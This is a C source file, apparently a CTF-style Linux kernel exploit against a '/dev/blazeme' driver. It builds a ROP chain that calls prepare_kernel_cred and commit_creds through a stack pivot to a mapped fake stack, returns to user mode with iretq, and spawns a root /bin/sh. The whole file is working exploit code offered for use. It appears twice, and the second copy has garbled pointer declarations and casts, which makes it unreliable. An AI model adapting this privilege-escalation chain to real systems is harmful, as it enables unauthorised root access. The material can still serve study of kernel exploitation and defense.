hama7230/exp.c

## exp.c
// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp
#define O_RDWR  0x0002
#define KBUF_LEN (64)
#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define MAP_PRIVATE     0x02            /* Changes are private.  */
#define MAP_ANONYMOUS 0x20            /* Don't use a file.  */
#define MAP_POPULATE       0x8000
#define MAP_FIXED   0x10
#define MAP_GROWSDOWN      0x0100


// syscalls
void exit(int e) {
    __asm__("mov rax, 60");
    __asm__("syscall");
    __builtin_unreachable();
}

int read(int fd, char* buf, int size) {
    __asm__("mov rax, 0");
    __asm__("syscall");
}

int write(int fd, char* buf, int size) {
    __asm__("mov rax, 1");
    __asm__("syscall");
}


int open(char* pathname, int flags) {
    __asm__("mov rax, 2");
    __asm__("syscall");

}

int close(unsigned int fd) {
    __asm__("mov rax, 3");
    __asm__("syscall");
}

void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
    __asm__("mov r10, rcx");
    __asm__("mov rax, 9");
    __asm__("syscall");
}

int execve(char *filename, char *const argv[], char *const envp[]) {
    __asm__("mov rax, 59");
    __asm__("syscall");
}


// helper functions
unsigned long strlen(char* buf) {
    unsigned long i = 0;
    while( buf[i] != '\x00') {
        i++;
    }
    return i;
}

void puts(char *buf) {
    write(1, buf, strlen(buf));
    write(1, "\n", 1);
}

void memset(char* s, int c, unsigned long len) {
    unsigned long i;
    for (i=0;  i<len; i++)
        s[i] = c;
}


static void shell() {
    char *args[] = { "/bin/sh", 0 };
    execve("/bin/sh", args, 0);
    exit(0);
}

// ffffffff81063b50 T prepare_kernel_cred
// ffffffff81063960 T commit_creds
// 0xffffffff8109c604: mov esp, 0x01740000 ; ret  ;  (1 found)
// 0xffffffff811664cc: pop rdi ; ret  ;  (27 found)
// 0xffffffff81085026: mov rdi, rax ; call rdx ;  (12 found)
// 0xffffffff81148e10: pop rdx ; ret  ;  (19 found)
// 0xffffffff811d20dd: xor rax, rax ; ret  ;  (26 found)
unsigned long prepare_kernel_cred = 0xffffffff81063b50;
unsigned long commit_creds = 0xffffffff81063960;
unsigned long pop_rdx = 0xffffffff81148e10;
unsigned long pop_rdi = 0xffffffff811664cc;
unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026;
unsigned long xor_rax_ret = 0xffffffff811d20dd;
unsigned long pivot_gadget = 0xffffffff8109c604;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long shell_v = shell;

static void save_state() {
    __asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
    __asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
    __asm__("pushfq");
    __asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
}

static void restore_state() {
    __asm__("swapgs");
    __asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss));
    __asm__("mov rax, 0x01740000");
    __asm__("mov [rsp+0x18], rax");
    __asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags));
    __asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs));
    __asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v));
    __asm__("iretq");
}


void _start(void) {
    int fd;
    char buf[KBUF_LEN];
    int i;
    unsigned long* fake_stack;

    save_state();

    fd = open("/dev/blazeme", O_RDWR);
    if (fd < 0) {
        puts("open() failure");
        exit(1);
    }

    fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
    fake_stack += (0x1000/ sizeof(unsigned long));
    *fake_stack ++= pop_rdi;
    *fake_stack ++= 0;
    *fake_stack ++= prepare_kernel_cred;
    *fake_stack ++= pop_rdx;
    *fake_stack ++= commit_creds + 6;
    *fake_stack ++= mov_rdi_rax_call_rdx;
    *fake_stack ++= xor_rax_ret;
    *fake_stack ++= restore_state;

    memset(buf, 'a', 2);
    for (i = 0; i<KBUF_LEN/8 ; i++) {
        unsigned long *p = (unsigned long*)(buf+2+i*8);
        *p = pivot_gadget;
    }
    while (1) {
        write(fd, buf, KBUF_LEN);
    }
    exit(0);
}
	// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp
	#define O_RDWR 0x0002
	#define KBUF_LEN (64)
	#define PROT_READ 0x1 /* Page can be read. */
	#define PROT_WRITE 0x2 /* Page can be written. */
	#define MAP_PRIVATE 0x02 /* Changes are private. */
	#define MAP_ANONYMOUS 0x20 /* Don't use a file. */
	#define MAP_POPULATE 0x8000
	#define MAP_FIXED 0x10
	#define MAP_GROWSDOWN 0x0100


	// syscalls
	void exit(int e) {
	__asm__("mov rax, 60");
	__asm__("syscall");
	__builtin_unreachable();
	}

	int read(int fd, char* buf, int size) {
	__asm__("mov rax, 0");
	__asm__("syscall");
	}

	int write(int fd, char* buf, int size) {
	__asm__("mov rax, 1");
	__asm__("syscall");
	}


	int open(char* pathname, int flags) {
	__asm__("mov rax, 2");
	__asm__("syscall");

	}

	int close(unsigned int fd) {
	__asm__("mov rax, 3");
	__asm__("syscall");
	}

	void mmap(void addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
	__asm__("mov r10, rcx");
	__asm__("mov rax, 9");
	__asm__("syscall");
	}

	int execve(char filename, char const argv[], char *const envp[]) {
	__asm__("mov rax, 59");
	__asm__("syscall");
	}


	// helper functions
	unsigned long strlen(char* buf) {
	unsigned long i = 0;
	while( buf[i] != '\x00') {
	i++;
	}
	return i;
	}

	void puts(char *buf) {
	write(1, buf, strlen(buf));
	write(1, "\n", 1);
	}

	void memset(char* s, int c, unsigned long len) {
	unsigned long i;
	for (i=0; i<len; i++)
	s[i] = c;
	}


	static void shell() {
	char *args[] = { "/bin/sh", 0 };
	execve("/bin/sh", args, 0);
	exit(0);
	}

	// ffffffff81063b50 T prepare_kernel_cred
	// ffffffff81063960 T commit_creds
	// 0xffffffff8109c604: mov esp, 0x01740000 ; ret ; (1 found)
	// 0xffffffff811664cc: pop rdi ; ret ; (27 found)
	// 0xffffffff81085026: mov rdi, rax ; call rdx ; (12 found)
	// 0xffffffff81148e10: pop rdx ; ret ; (19 found)
	// 0xffffffff811d20dd: xor rax, rax ; ret ; (26 found)
	unsigned long prepare_kernel_cred = 0xffffffff81063b50;
	unsigned long commit_creds = 0xffffffff81063960;
	unsigned long pop_rdx = 0xffffffff81148e10;
	unsigned long pop_rdi = 0xffffffff811664cc;
	unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026;
	unsigned long xor_rax_ret = 0xffffffff811d20dd;
	unsigned long pivot_gadget = 0xffffffff8109c604;
	unsigned long user_cs;
	unsigned long user_ss;
	unsigned long user_rflags;
	unsigned long shell_v = shell;

	static void save_state() {
	__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs));
	__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss));
	__asm__("pushfq");
	__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags));
	}

	static void restore_state() {
	__asm__("swapgs");
	__asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss));
	__asm__("mov rax, 0x01740000");
	__asm__("mov [rsp+0x18], rax");
	__asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags));
	__asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs));
	__asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v));
	__asm__("iretq");
	}


	void _start(void) {
	int fd;
	char buf[KBUF_LEN];
	int i;
	unsigned long* fake_stack;

	save_state();

	fd = open("/dev/blazeme", O_RDWR);
	if (fd < 0) {
	puts("open() failure");
	exit(1);
	}

	fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ\|PROT_WRITE, 0x32 \| MAP_POPULATE, -1, 0);
	fake_stack += (0x1000/ sizeof(unsigned long));
	*fake_stack ++= pop_rdi;
	*fake_stack ++= 0;
	*fake_stack ++= prepare_kernel_cred;
	*fake_stack ++= pop_rdx;
	*fake_stack ++= commit_creds + 6;
	*fake_stack ++= mov_rdi_rax_call_rdx;
	*fake_stack ++= xor_rax_ret;
	*fake_stack ++= restore_state;

	memset(buf, 'a', 2);
	for (i = 0; i<KBUF_LEN/8 ; i++) {
	unsigned long p = (unsigned long)(buf+2+i*8);
	*p = pivot_gadget;
	}
	while (1) {
	write(fd, buf, KBUF_LEN);
	}
	exit(0);
	}